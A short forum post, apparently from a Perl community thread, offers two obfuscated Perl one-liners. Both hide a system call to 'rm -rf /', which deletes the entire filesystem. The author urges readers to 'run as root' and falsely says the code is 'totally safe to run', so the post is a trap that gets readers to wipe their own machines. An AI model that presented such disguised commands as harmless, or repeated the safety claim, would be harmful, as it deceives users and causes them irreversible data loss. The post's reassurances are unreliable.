There was rm -rf /, this is another one.
perl -e '_(qw|JUNK rm -rf /|);sub _{shift&&&_&&system @_}'
Update: it looks much better like this:
perl -e 'sub _ {shift&&&_&&system@_} _ qw|JUNK rm -rf /|'
For best results, run as root :)
P.S: It is totally safe to run this, although I take no responsibility for whatever happens after that.
In reply to Another rm -rf / by Chady
For: | Use: | ||
& | & | ||
< | < | ||
> | > | ||
[ | [ | ||
] | ] |